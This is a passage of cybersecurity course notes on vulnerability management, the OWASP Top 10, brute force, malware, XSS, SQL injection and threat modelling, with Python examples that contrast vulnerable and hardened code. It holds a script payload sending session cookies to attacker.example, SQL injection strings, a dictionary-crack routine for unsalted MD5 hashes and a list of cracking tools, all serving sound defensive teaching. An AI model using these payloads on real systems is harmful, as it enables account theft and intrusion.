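The design difference is where the decision lives: in RBAC an administrator changes a role's permission set and every holder of that role is affected at once, which is what makes it auditable against a baseline; in DAC each owner decides per object, which is convenient but leaves no single place to review who has access to what.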

Module 3 – Vulnerabilities in the System


Security teams spend a lot of time finding vulnerabilities and thinking of how they can be
exploited. They do this with the process known as vulnerability management. Vulnerability
management is the process of finding and patching vulnerabilities before they can be exploited.

Vulnerability management is a four-step process:

 The first step is to identify vulnerabilities.
 The second step is to consider potential exploits of those vulnerabilities.
 The third step is to prepare defenses against threats.
 The fourth step is to evaluate those defenses.

New vulnerabilities are constantly being discovered. When one is found and exploited before the
vendor or defenders know about it, the exploit is known as a zero-day. The term zero-day refers
to the fact that the exploit is happening in real time with zero days to prepare a fix. These
kinds of exploits are dangerous. They represent threats that haven't been planned for yet.

Defense in depth strategy


Defense in depth is commonly referred to as the castle approach because it resembles the
layered defenses of a castle.

It's mainly used in cybersecurity to protect information using a five layer design. Each layer
features a number of security controls that protect information as it travels in and out of the
model.
 The first layer of defense in depth is the perimeter layer. This layer includes some
technologies that we've already explored, like usernames and passwords. Mainly, this
is a user authentication layer that filters external access. Its function is to only allow
access to trusted partners to reach the next layer of defense.

 Second, the network layer is more closely aligned with authorization. The network layer
is made up of technologies like network firewalls and similar controls that decide which
traffic may pass.

 Next is the endpoint layer. Endpoints refer to the devices that have access on a
network. They could be devices like a laptop, desktop, or a server. One example of a
technology that protects these devices is anti-virus software.

 After that, we get to the application layer. This includes all the interfaces that are used
to interact with technology. At this layer, security measures are programmed as part of an
application. One common example is multi-factor authentication.

 And finally, the fifth layer of defense is the data layer. At this layer, we've arrived at the
critical data that must be protected, like personally identifiable information. One security
control that is important here in this final layer of defense is asset classification.

Common vulnerabilities and exposures


While a vulnerability is a weakness of a system, an exposure is a mistake that can be exploited
by a threat.

One of the most popular libraries of vulnerabilities and exposures is the CVE list. The common
vulnerabilities and exposures list, or CVE list, is an openly accessible dictionary of known
vulnerabilities and exposures, maintained by MITRE.

Before a vulnerability is assigned a CVE ID, it is checked against four criteria.

 First, it must be independent of other issues. In other words, the vulnerability should be
able to be fixed without having to fix something else.

 Second, it must be recognized as a potential security risk by whoever reports it.

 Third, the vulnerability must be submitted with supporting evidence.

 And finally, the reported vulnerability can only affect one codebase, or in other words,
only one program's source code.

The NIST National Vulnerability Database (NVD) uses what's known as the common vulnerability
scoring system, or CVSS, which is a measurement system that scores the severity of a
vulnerability. Security teams use CVSS as a way of calculating the impact a vulnerability could
have on a system. They also use it to determine how quickly a vulnerability should be
patched.

The NVD provides a base score for each CVE on a scale of 0-10. Base scores reflect the
intrinsic characteristics of a vulnerability at the moment it is evaluated, so they don't change
over time; an organization's own exposure is captured in separate temporal and environmental
scores.

In general, a CVSS score below 4.0 is considered to be low risk and doesn't require
immediate attention. Scores from 4.0 to 6.9 are medium and 7.0 to 8.9 are high. Anything 9.0
or above is considered to be a critical risk to company assets that should be addressed
right away.
The OWASP Top 10

The OWASP Top 10 is a regularly updated ranking of the most critical security risks to web
applications. These are the categories that appear in the current list:

Broken access control


Access controls limit what users can do in a web application. For example, a blog
might allow visitors to post comments on a recent article but restricts them from
deleting the article entirely. Failures in these mechanisms can lead to unauthorized
information disclosure, modification, or destruction. They can also give someone
unauthorized access to other business applications.

Cryptographic failures
Information is one of the most important assets businesses need to protect. Privacy
laws such as General Data Protection Regulation (GDPR) require sensitive data to be
protected by effective encryption methods. Vulnerabilities can occur when businesses
fail to encrypt things like personally identifiable information (PII), or protect it weakly. For
example, if a web application stores passwords with a weak, unsalted hashing algorithm like
MD5, it's more at risk of suffering a data breach.

Injection
Injection occurs when untrusted input is passed to an interpreter and treated as code or as part
of a query rather than as plain data, so that an attacker's input changes what the application
executes.

Insecure design
Applications should be designed in such a way that makes them resilient to attack.
Insecure design refers to a wide range of missing or poorly implemented security
controls that should have been programmed into an application when it was being
developed.

Security misconfiguration
Misconfigurations occur when security settings aren’t properly set or maintained.

Vulnerable and outdated components


Vulnerable and outdated components is a category that mainly relates to application
development. It covers the use of libraries, frameworks, and other dependencies that have
known vulnerabilities or are no longer maintained.

Identification and authentication failures


Identification is the keyword in this vulnerability category. When applications fail to
recognize who should have access and what they’re authorized to do, it can lead to
serious problems.

Software and data integrity failures


Software and data integrity failures are instances when updates or patches are
inadequately reviewed before implementation, or when code and data from untrusted sources
are used without verifying their integrity.

Security logging and monitoring failures


In security, it's important to be able to log and trace back events. Without sufficient logging
and monitoring, an intrusion can go unnoticed for a long time, and there is no record from which
to reconstruct what happened.
Server-side request forgery
Companies have public and private information stored on web servers. When you use
a hyperlink or click a button on a website, a request is sent to a server that should
validate who you are, fetch the appropriate data, and then return it to you. Server-side
request forgery (SSRF) is when attackers manipulate a server into making requests on their
behalf, reading or updating resources they could not reach directly, such as internal services
behind the firewall.

Open-source intelligence

OSINT is the collection and analysis of information from publicly available sources to generate
usable intelligence. It's commonly used to support cybersecurity activities, like identifying
potential threats and vulnerabilities.

Information vs intelligence

Information refers to the collection of raw data or facts about a specific subject. Intelligence,
on the other hand, refers to the analysis of information to produce knowledge or insights that
can be used to support decision-making.

Here are some of the ways OSINT can be used to generate intelligence:

 To provide insights into cyber attacks

 To detect potential data exposures

 To evaluate existing defenses

 To identify unknown vulnerabilities

OSINT tools

 VirusTotal is a service that allows anyone to analyze suspicious files, domains, URLs,
and IP addresses for malicious content.

 MITRE ATT&CK® is a knowledge base of adversary tactics and techniques based on
real-world observations.

 OSINT Framework is a web-based interface where you can find OSINT tools for
almost any kind of source or platform.

 Have I Been Pwned is a tool that can be used to search for breached email accounts.
Vulnerability assessments
Weaknesses and flaws are generally found during a vulnerability assessment.
A vulnerability assessment is the internal review process of an organization's security systems.

Once the scope has been decided, vulnerability assessments typically follow a four-step
process.
 The first step is identification. Here, scanning tools and manual testing are used to find
vulnerabilities. During the identification step, the goal is to understand the current state of
a security system, like taking a picture of it.
 The next step of the process is vulnerability analysis. During this step, each of the
vulnerabilities that were identified is tested to confirm it is real and to understand how it
could be exploited.
 The third step of the process is risk assessment. During this step of the process, a
score is assigned to each vulnerability. This score is assigned based on two factors: how
severe the impact would be if the vulnerability were to be exploited and the likelihood of
this happening.
 The fourth and final step of vulnerability assessment is remediation. It's during this step
that the vulnerabilities that can impact the organization are addressed.

What is a vulnerability scanner?

A vulnerability scanner is software that automatically compares known vulnerabilities and
exposures against the technologies on the network. In general, these tools scan systems to
find misconfigurations or programming flaws.

Scanning tools are used to analyze each of the five attack surfaces described in the defense
in depth strategy:

1. Perimeter layer, like authentication systems that validate user access

2. Network layer, which is made up of technologies like network firewalls and others

3. Endpoint layer, which describes devices on a network, like laptops, desktops, or servers

4. Application layer, which involves the software that users interact with

5. Data layer, which includes any information that’s stored, in transit, or in use

External vs. internal scans

External and internal scans simulate an attacker's approach.

External scans test the perimeter layer from outside of the internal network. They analyze
outward-facing systems, like websites and firewalls. These kinds of scans can uncover exposed
network ports or vulnerable servers.
Internal scans start from the opposite end by examining an organization's internal systems.
For example, this type of scan might analyze application software for weaknesses in how it
handles user input.

Authenticated vs. unauthenticated scans


Authenticated and unauthenticated scans simulate whether or not a user has access to a
system.

Authenticated scans might test a system by logging in with a real user account or even with
an admin account. These service accounts are used to check for vulnerabilities, like broken
access controls.

Unauthenticated scans simulate external threat actors that do not have access to your
business resources.

Limited vs. comprehensive scans

Limited and comprehensive scans differ in how much of the environment, and which of the
devices accessed by internal and external users, they cover.

Limited scans analyze particular devices on a network, like searching for misconfigurations
on a firewall.

Comprehensive scans analyze all devices connected to a network. This includes operating
systems, user databases, and more.

Pro tip: Discovery scanning should be done prior to limited or comprehensive scans.
Discovery scanning is used to get an idea of the computers, devices, and open ports that are
on a network.

The importance of updates


A patch update is a software and operating system update that addresses security
vulnerabilities within a program or product. Patches usually contain bug fixes that
address common security vulnerabilities and exposures.

Common update strategies

When software updates become available, clients and users have two installation options:

 Manual updates

 Advantage: An advantage of manual update deployment strategies is control.
That can be useful if software updates are not thoroughly tested by developers,
leading to instability issues.

 Disadvantage: A drawback to manual update deployments is that critical
updates can be forgotten or disregarded entirely.

 Automatic updates

 Advantage: An advantage to automatic updates is that the deployment process
is simplified. It also keeps systems and software current with the latest, critical
patches.

 Disadvantage: A drawback to automatic updates is that instability issues can
occur if the patches were not thoroughly tested by the vendor. This can result
in performance problems and a poor user experience.

End-of-life software

Sometimes updates are not available for a certain type of software known as end-of-life
(EOL) software. All software has a lifecycle. It begins when it's produced and ends when the
vendor stops supporting it, usually some time after a newer version is released. At that
point, developers allocate their resources to the newer versions, and the older version becomes
EOL software. While the older software is still useful, the manufacturer no longer supports it
with updates or security patches.

Note: Patches and updates are very different from upgrades. Upgrades refer to completely
new versions of hardware or software that can be purchased.

The risks that EOL software presents continue to grow as more connected devices enter
the marketplace. For example, there are billions of Internet of Things (IoT) devices, like
smart light bulbs, connected to home and work networks. In some business settings, all
an attacker needs is a single unpatched device to gain access to the network and cause
problems.

Penetration testing

A penetration test, or pen test, is a simulated attack that helps identify vulnerabilities in
systems, networks, websites, applications, and processes. The simulated attack in a pen test
involves using the same tools and techniques as malicious actors in order to mimic a real life
attack. Since a pen test is an authorized attack, it is considered to be a form of ethical
hacking. Unlike a vulnerability assessment that finds weaknesses in a system's security, a pen
test exploits those weaknesses to determine the potential consequences if the system breaks
or gets broken into by a threat actor.

Depending on their objectives, organizations might use a few different approaches to
penetration testing:

 Red team tests simulate attacks to identify vulnerabilities in systems, networks, or
applications.

 Blue team tests focus on defense and incident response to validate an organization's
existing security systems.
 Purple team tests are collaborative, focusing on improving the security posture of the
organization by combining elements of red and blue team exercises.

Red team tests are commonly performed by independent pen testers who are hired to
evaluate internal systems.

Penetration testing strategies

There are three common penetration testing strategies:

 Open-box testing is when the tester has the same privileged access that an internal
developer would have—information like system architecture, data flow, and network
diagrams. This strategy goes by several different names, including internal, full
knowledge, white-box, and clear-box penetration testing.

 Closed-box testing is when the tester has little to no access to internal systems—
similar to a malicious hacker. This strategy is sometimes referred to as external,
black-box, or zero knowledge penetration testing.

 Partial knowledge testing is when the tester has limited access and knowledge of an
internal system—for example, a customer service representative. This strategy is also
known as gray-box testing.

Closed-box testers tend to produce the most accurate simulations of a real-world attack.
Nevertheless, each strategy produces valuable results by demonstrating how an attacker
might infiltrate a system and what information they could access.

Programming skills are very helpful in penetration testing because it's often performed on
software and IT systems. With enough practice and dedication, cybersecurity professionals at
any level can develop the skills needed to be a pen tester.

Bug bounty programs


Organizations commonly run bug bounty programs, which offer freelance pen testers
financial rewards for finding and reporting vulnerabilities in their products. Bug bounties are
great opportunities for amateur security professionals to participate and grow their skills.

HackerOne is a community of ethical hackers where you can find active bug bounties to
participate in.

Fortify against brute force cyber attacks


Attackers use a variety of tactics to find their way into a system:

 Simple brute force attacks are an approach in which attackers guess a user's login
credentials. They might do this by entering any combination of username and
password that they can think of until they find the one that works.
 Dictionary attacks are a similar technique except in these instances attackers use a list
of commonly used credentials to access a system. This list is similar to matching a
definition to a word in a dictionary.

 Reverse brute force attacks are similar to dictionary attacks, except they start with a
single known password and try it against many accounts or systems until a match is found.
This pattern is often called password spraying.

 Credential stuffing is a tactic in which attackers use stolen login credentials from
previous data breaches to access user accounts at another organization. A specialized
type of credential stuffing is called pass the hash. These attacks reuse stolen, unsalted
hashed credentials to trick an authentication system into creating a new authenticated
user session on the network, without ever recovering the plaintext password.

Note: Besides access credentials, encrypted information can sometimes be brute forced using
a technique known as exhaustive key search.

Each of these methods involves a lot of guesswork. Brute forcing your way into a system can
be a tedious and time-consuming process, especially when it's done manually. That's why
threat actors often use tools to conduct their attacks.
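The patterns above leave different fingerprints in authentication logs: a simple brute force or dictionary attack is many failures against one account from one source, while a reverse brute force or credential-stuffing run is one or two failures each across many accounts from one source. As an added example (not from the original notes), this Python classifies sources by that shape. The log format and every line are constructed samples; the regular expression would need adjusting for real logs, and since logs never show the guessed passwords, spraying and stuffing are reported as one category.

```python
"""Spotting brute-force patterns in failed-login records.

Added example, not from the original notes. The log format and every line
below are constructed samples; adapt LOG_RE to your own authentication logs.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(r"^(?P<ts>\S+) auth: FAILED user=(?P<user>\S+) src=(?P<ip>\S+)$")


def sample_log():
    """Constructed log lines in a made-up syslog-like format."""
    rows = []
    # One source hammering a single account (simple brute force / dictionary attack).
    for i in range(12):
        rows.append(f"2024-05-01T10:00:{i:02d}Z auth: FAILED user=alice src=203.0.113.5")
    # One source trying many accounts once each (reverse brute force / credential stuffing).
    for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"]):
        rows.append(f"2024-05-01T10:05:{i:02d}Z auth: FAILED user={user} src=198.51.100.7")
    # Benign: a single typo followed by a successful login.
    rows.append("2024-05-01T10:07:00Z auth: FAILED user=grace src=192.0.2.9")
    rows.append("2024-05-01T10:07:05Z auth: OK user=grace src=192.0.2.9")
    return rows


def failures_by_source(lines):
    """{src_ip: {user: failure_count}}; non-failure or unparseable lines are skipped."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            counts[m["ip"]][m["user"]] += 1
    return counts


def classify(lines, per_account=10, distinct_accounts=5):
    """Tag each source IP with the guessing pattern its failures resemble.
    Thresholds are assumptions to tune against your own baseline."""
    findings = {}
    for ip, per_user in failures_by_source(lines).items():
        tags = set()
        if max(per_user.values()) >= per_account:
            tags.add("brute_force")          # many guesses against one account
        if len(per_user) >= distinct_accounts and max(per_user.values()) <= 2:
            tags.add("spray_or_stuffing")   # one or two tries each across many accounts
        if tags:
            findings[ip] = tags
    return findings


if __name__ == "__main__":
    for ip, tags in classify(sample_log()).items():
        print(ip, sorted(tags))
```

The second rule is the one a naive "N failures per account" lockout misses entirely: the spraying source never trips a per-account counter, which is why detection has to be keyed on the source as well as the account.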

Tools of the trade

These are some common brute forcing tools:

 Aircrack-ng

 Hashcat

 John the Ripper

 Ophcrack

 THC Hydra

Sometimes, security professionals use these tools to test and analyze their own systems. They
each serve different purposes. For example, you might use Aircrack-ng to test a Wi-Fi
network for vulnerabilities to brute force attack.

Prevention measures

Organizations defend against brute force attacks with a combination of technical and
managerial controls. Each makes cracking defense systems through brute force less likely:

 Hashing and salting

 Multi-factor authentication (MFA)

 CAPTCHA

 Password policies
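Hashing and salting deserve a concrete look, since they are also the point behind the MD5 warning in the cryptographic failures category above. As an added example (not from the original notes), this Python puts the weak pattern, a fast unsalted MD5, beside a salted, deliberately slow scheme built only from the standard library (PBKDF2-HMAC-SHA256 with a random 16-byte salt and a constant-time comparison). The passwords and wordlist are made-up sample values, and the iteration count is an assumption kept low enough to run quickly; raise it in production.

```python
"""Hashing and salting as a brute-force defense: weak unsalted MD5 beside a
salted, slow, standard-library PBKDF2 scheme.

Added example, not from the original notes. Passwords and wordlist are
made-up sample values; ITERATIONS is kept low so the demo runs fast and
should be raised in production.
"""
import hashlib
import hmac
import secrets
from typing import Optional

ITERATIONS = 100_000  # assumption: tune upward so one guess costs a noticeable fraction of a second


def md5_unsalted(password: str) -> str:
    """The weak pattern: fast and deterministic with no salt, so equal passwords
    produce equal hashes and precomputed tables apply to every account at once."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Random per-user salt plus a slow key derivation.
    Stored form: pbkdf2_sha256$<iterations>$<salt_hex>$<hash_hex>."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time
    so response timing does not leak how many bytes matched."""
    try:
        scheme, iters, salt_hex, digest_hex = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                        bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
    except ValueError:          # malformed record, bad hex, non-integer iterations
        return False


def crack_unsalted_md5(leaked_hash: str, wordlist) -> Optional[str]:
    """Offline dictionary attack on a leaked unsalted MD5: one cheap hash per guess,
    and a single hit recovers every account that chose the same password."""
    for guess in wordlist:
        if md5_unsalted(guess) == leaked_hash:
            return guess
    return None


if __name__ == "__main__":
    pw = "Summer2024!"
    print(md5_unsalted(pw) == md5_unsalted(pw))            # True: two users, same hash
    print(hash_password(pw) == hash_password(pw))          # False: salt differs per record
    record = hash_password(pw)
    print(verify_password(pw, record), verify_password("wrong", record))  # True False
    print(crack_unsalted_md5(md5_unsalted(pw), ["123456", "password", pw]))  # Summer2024!
```

With the salted scheme the attacker must run the slow derivation separately for every account and every guess; with unsalted MD5 one pass over a wordlist covers the whole user table.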
CAPTCHA
CAPTCHA stands for Completely Automated Public Turing test to tell Computers and
Humans Apart. It is known as a challenge-response authentication system. CAPTCHA asks
users to complete a simple test that proves they are human and not software that’s trying to
brute force a password.

Module 4

Social engineering tactics

These are common types of social engineering to watch out for:

 Baiting is a social engineering tactic that tempts people into compromising their
security. A common example is USB baiting that relies on someone finding an
infected USB drive and plugging it into their device.

 Phishing is the use of digital communications to trick people into revealing sensitive
data or deploying malicious software. It is one of the most common forms of social
engineering, typically performed via email.

 Quid pro quo is a type of baiting used to trick someone into believing that they’ll be
rewarded in return for sharing access, information, or money. For example, an
attacker might impersonate a loan officer at a bank and call customers offering them a
lower interest rate on their credit card. They'll tell the customers that they simply need
to provide their account details to claim the deal.

 Tailgating is a social engineering tactic in which unauthorized people follow an
authorized person into a restricted area. This technique is also sometimes referred to
as piggybacking.

 Watering hole is a type of attack when a threat actor compromises a website
frequently visited by a specific group of users. Oftentimes, these watering hole sites
are infected with malicious software. An example is the Holy Water attack of 2020
that infected various religious, charity, and volunteer websites.

Phishing for information


Phishing is the use of digital communications to trick people into revealing sensitive data or
deploying malicious software. Phishing leverages many communication technologies, but the
term is mainly used to describe attacks that arrive by email.

Attackers who carry out these attacks commonly use phishing kits. A phishing kit is a collection
of software tools needed to launch a phishing campaign. People with little technical background
can use one of these kits. Each of the tools inside is designed to avoid detection.

 The first is malicious attachments. These are files that are infected and can cause harm
to the organization's systems.

 Phishing kits also include fake-data collection forms. These forms look like legitimate
forms, like a survey.

 The third resource they include are fraudulent web links.


Smishing is the use of text messages to obtain sensitive information or to impersonate a known
source.

Vishing is the exploitation of electronic voice communication to obtain sensitive information or
impersonate a known source.

Most organizations use a few basic security measures to prevent these and any other types of
phishing attacks from becoming a problem. Anti-phishing policies spread awareness
and encourage users to follow data security procedures correctly. Employee training resources
also help inform employees about things to look for when an email looks suspicious.
Another line of defense against phishing is securing email inboxes. Organizations also use
intrusion prevention systems to look for unusual patterns in email traffic.

Recent trends
A type of targeted phishing that evolved in the 2010s is angler phishing. Angler phishing is a
technique where attackers impersonate customer service representatives on social media. This
tactic evolved from people’s tendency to complain about businesses online.

Malicious software (Malware)


Five of the most common types of malware are a virus, worm, trojan, ransomware, and spyware.

Virus
A virus is malicious code written to interfere with computer operations and cause damage to data
and software. Viruses typically hide inside of trusted applications. When the infected program is
launched, the virus clones itself and spreads to other files on the device. An important
characteristic of viruses is that they have to be activated by the user to start the infection.

Worm
A worm is malware that can duplicate and spread itself across systems on its own. While viruses
require users to perform an action like opening a file to duplicate, worms use an infected device
as a host. They scan the connected network for other devices. Worms then infect everything on
the network without requiring an action to trigger the spread.

Trojan
A trojan, or Trojan horse, is malware that looks like a legitimate file or program.
Ransomware
Attackers often use trojans to gain access and install another kind of malware called
ransomware. Ransomware is a type of malicious attack where attackers encrypt an
organization's data and demand payment to restore access. A unique feature of ransomware
attacks is that they make themselves known to their targets. Without doing this, they couldn't
collect the money they demand. Normally, they provide a way to decrypt the data once the sum
of money is paid. Unfortunately, there's no guarantee they will, or that they won't return to
demand more.

Spyware
Spyware is malware that's used to gather and sell information without consent. Consent is a
keyword in this case.

Adware

Advertising-supported software, or adware, is a type of legitimate software that is sometimes
used to display digital advertisements in applications. Software developers often use adware
as a way to lower their production costs or to make their products free to the public, also
known as freeware or shareware. In these instances, developers monetize their product
through ad revenue rather than at the expense of their users.

Malicious adware falls into a sub-category of malware known as a potentially unwanted
application (PUA). A PUA is a type of unwanted software that is bundled in with legitimate
programs which might display ads, cause device slowdown, or install other software.

Scareware

Another type of PUA is scareware. This type of malware employs tactics to frighten users
into infecting their own device.

Fileless malware

Fileless malware does not need to be installed by the user because it uses legitimate
programs that are already installed to infect a computer. This type of infection resides in
memory where the malware never touches the hard drive. This is unlike the other types of
malware, which are stored within a file on disk. Instead, these stealthy infections get into the
operating system or hide within trusted applications.

Pro tip: Fileless malware is detected by performing memory analysis, which requires
experience with operating systems.

Rootkits
A rootkit is malware that provides remote, administrative access to a computer. Most
attackers use rootkits to open a backdoor to systems, allowing them to install other forms of
malware or to conduct network security attacks.

This kind of malware is often spread by a combination of two components: a dropper and a
loader. A dropper is a type of malware that comes packed with malicious code which is
delivered and installed onto a target system.

Multi-staged malware attacks, where multiple packets of malicious code are deployed, commonly
use a variation called a loader. A loader is a type of malware that downloads strains of malicious
code from an external source and installs them onto a target system. Attackers might use loaders
for different purposes, such as to set up another type of malware---a botnet.

Botnet

A botnet, short for “robot network,” is a collection of computers infected by malware that are
under the control of a single threat actor, known as the “bot-herder.” Viruses, worms, and
trojans are often used to spread the initial infection and turn the devices into a bot for the bot-
herder.

The rise of cryptojacking


Another more recent type of malware is cryptojacking. Cryptojacking is a form of malware that
installs software to illegally mine cryptocurrencies.

Crypto mining is similar to the process for mining for other resources, like gold. Mining for
something like gold involves machinery, such as trucks and bulldozers, that can dig through the
Earth. Crypto coins, on the other hand, use computers instead.

An intrusion detection system, or IDS, is an application that monitors system activity and alerts
on possible intrusions. When abnormal activity is detected, like malware mining for coins, the
IDS alerts security personnel.

Despite their usefulness, detection systems have a major drawback. New forms of malware can
remain undetected. Fortunately, there are subtle signs that indicate a device is infected with
cryptojacking software or other forms of malware.

By far the most telling sign of a cryptojacking infection is slowdown. Other signs include
increased CPU usage, sudden system crashes, and fast draining batteries. Another sign is
unusually high electricity costs related to the resource- intensive process of crypto mining.

There are several ways to reduce the likelihood of experiencing a malware attack like
cryptojacking. These defenses include things like using browser extensions designed to block
malware, using ad blockers, disabling JavaScript, and staying alert to the latest trends.

Web Based Exploits

Cross-site scripting (XSS)


Phishing and other social engineering techniques are common ways for malware to be
delivered. Another way it's spread is using a broad class of threats known as web-based exploits.
Web-based exploits are malicious code or behavior that's used to take advantage of coding flaws
in a web application.
Web applications accept a high level of user interaction, and malicious hackers commonly exploit
that interaction using injection attacks. An injection attack is malicious code inserted into a
vulnerable application.
A common and dangerous type of injection attack that's a threat to web apps is cross-site
scripting. Cross-site scripting, or XSS, is an injection attack that inserts code into a vulnerable
website or web application. These attacks are often delivered by exploiting the two languages
used by most websites, HTML and JavaScript.
Both can give cybercriminals access to everything that loads on the infected web page. This can
include session cookies, geolocation, and even webcams and microphones.

There are three main types of cross-site scripting attacks: reflected, stored, and DOM-based.

 A reflected XSS attack is an instance where a malicious script is sent to the server, usually
in a crafted link, and echoed back to the victim in the server's response.

 In a stored XSS attack, the malicious script isn't hidden in a link that needs to be sent to
the server. Instead, the script is saved on the server, for example in a comment or profile
field, and delivered to every user who later views that content.

 Finally there's DOM-based XSS. DOM stands for Document Object Model, which is the
browser's in-memory representation of the page. A DOM-based XSS attack is an instance when
client-side script on the page writes attacker-controlled data, such as part of the URL, into
the page. Unlike reflected XSS, these attacks don't need to be sent to the server to activate.
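Whichever of the three delivery routes is used, the flaw is the same: user-controlled text is written into the page without being encoded for its context. As an added example (not from the original notes), this Python shows a reflected-XSS search page in its vulnerable and hardened forms, plus the session-cookie attributes that limit the damage if a script does run. The payload, the page markup and the `attacker.example` host are constructed for illustration.

```python
"""Reflected XSS: the vulnerable page beside the hardened one.

Added example, not from the original notes. The payload, the search page
and the cookie value are constructed for illustration; attacker.example
is a placeholder host.
"""
import html
import re

# What a reflected-XSS link would carry in its ?q= parameter: exfiltrate document.cookie.
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'


def render_unsafe(query: str) -> str:
    """Vulnerable: user input is concatenated straight into the HTML, so the
    browser parses whatever markup and script the query contains."""
    return f'<h1>Results for: {query}</h1><input name="q" value="{query}">'


def render_safe(query: str) -> str:
    """Hardened: encode at output time. < > & " ' become entities, so the text
    is displayed but never parsed as markup; quote=True also covers the
    attribute value, where an unescaped quote would let input break out."""
    safe = html.escape(query, quote=True)
    return f'<h1>Results for: {safe}</h1><input name="q" value="{safe}">'


def has_script_tag(page: str) -> bool:
    """Crude check for a live <script> element in rendered output."""
    return re.search(r"<script\b", page, re.IGNORECASE) is not None


def session_cookie_header(token: str) -> str:
    """Defense in depth for the session token: HttpOnly keeps document.cookie
    from reading it even if a script runs; Secure and SameSite limit where
    the browser will send it."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print(has_script_tag(render_unsafe(PAYLOAD)))   # True: script executes in the victim's browser
    print(has_script_tag(render_safe(PAYLOAD)))     # False: shown as text
    print(PAYLOAD in render_unsafe(PAYLOAD), PAYLOAD in render_safe(PAYLOAD))  # True False
    print(session_cookie_header("abc123"))
```

Encoding rather than filtering is the point: the hardened page still shows the user exactly what they typed, it just no longer means anything to the HTML parser. The same rule applies to stored XSS (encode when the stored text is rendered) and to DOM-based XSS (assign untrusted data with `textContent`, not `innerHTML`).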

Exploitable gaps in databases


A SQL injection is an attack that executes unexpected queries on a database. Like cross-site
scripting, SQL injection occurs due to a lack of sanitized input.

The best way to defend against SQL injection is to keep user input from ever being parsed as
SQL. Developers can also validate and sanitize input, for example by rejecting or escaping
special SQL characters, as an additional layer.

A prepared statement is a coding technique in which the SQL statement, with placeholders for
values, is sent to the database and compiled before any user input is supplied. The input is
then bound to the placeholders as data, so it can never change the structure of the query.
When the user's input is unknown, the best practice is to use these prepared statements. With
just a few extra lines of code, the database parses the query first and treats the supplied
values purely as parameters.

Prevent injection attacks


SQL injection categories
There are three main categories of SQL injection:

 In-band

 Out-of-band

 Inferential

In-band SQL injection


In-band, or classic, SQL injection is the most common type. An in-band injection is one
that uses the same communication channel to launch the attack and gather the results.
Out-of-band SQL injection
An out-of-band injection is one that uses a different communication channel to launch the
attack and gather the results.

Inferential SQL injection


Inferential SQL injection occurs when an attacker is unable to directly see the results of
their attack. Instead, they can interpret the results by analyzing the behavior of the
system.

Injection Prevention
There are several ways to keep user input from being interpreted as code:

 Prepared statements: a coding technique that sends the SQL statement to the database
with placeholders, then binds user input to them as data rather than as part of the query text

 Input sanitization: programming that removes user input which could be interpreted
as code.

 Input validation: programming that ensures user input meets a system's expectations.
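As an added example (not from the original notes), the in-band case and two of the three defenses above, side by side in Python against an in-memory SQLite database. The users table and the payloads are constructed sample data. The vulnerable lookup splices the username into the SQL text, so a quote in the input ends the string and the rest is parsed as SQL; the prepared statement hands the same input to the database as a bound parameter, and a validation step rejects it before it gets that far.

```python
"""SQL injection: string-built query beside a parameterized one (sqlite3).

Added example, not from the original notes. The users table and the
payloads are constructed sample data.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "h1", "admin"), ("bob", "h2", "user")])
    return conn


def find_user_vulnerable(conn, username: str):
    """Vulnerable: the value is spliced into the SQL text, so quotes, OR and
    comment markers inside it are parsed as SQL."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username: str):
    """Prepared statement: the database parses the query with a ? placeholder
    first, then receives the value separately as data, never as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


USERNAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")


def validate_username(username: str) -> str:
    """Input validation as a second layer: reject anything outside the expected
    character set instead of trying to strip 'bad' characters out."""
    if not USERNAME_RE.match(username):
        raise ValueError("invalid username")
    return username


if __name__ == "__main__":
    db = make_db()
    attack = "x' OR '1'='1"
    print(find_user_vulnerable(db, attack))  # every row: the WHERE clause is always true
    print(find_user_safe(db, attack))        # []: no user is literally named x' OR '1'='1
    print(find_user_vulnerable(db, "bob' --"))  # [('bob', 'user')]: -- comments out the closing quote
    print(find_user_safe(db, "alice"))       # [('alice', 'admin')]
```

The placeholder syntax is `?` in SQLite and many drivers, `%s` in psycopg2, and named parameters elsewhere; the mechanism is the same in each. Validation alone is not a substitute, since not every field can be restricted to a tight character set, but it shrinks the attack surface and gives you a clean rejection to log.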

Threat Modelling
Threat modeling is a process of identifying assets, their vulnerabilities, and how each is exposed
to threats.

In general, there are six steps of a threat model. A DevSecOps team, which stands for
development, security, and operations, usually performs these analyses.

A typical threat modeling process is performed in a cycle:

 Define the scope.

 Identify threats.

 Characterize the environment.

 Analyze threats.

 Mitigate risks.

 Evaluate findings.

1. The first step is to define the scope of the model. At this stage, the team determines what
they're building by creating an inventory of assets and classifying them.

2. The second step is to identify threats. After threat actors have been identified, the team
puts together what's known as an attack tree. An attack tree is a diagram that maps
threats to assets.

3. Step three of the threat modeling process is to characterize the environment. Here, the
team applies an attacker mindset to the business. They consider how customers and
employees interact with the environment. Other factors they consider are external
partners and third-party vendors.

4. At step four, the objective is to analyze threats. Here, the team works together to
examine existing protections and identify gaps. They then rank threats according to the
risk score they assign to each.

5. During step five, the team decides how to mitigate risk. At this point, the group creates
their plan for defending against threats.

6. The sixth and final step is to evaluate findings. At this stage, everything that was done
during the exercise is documented, fixes are applied, and the team makes note of any
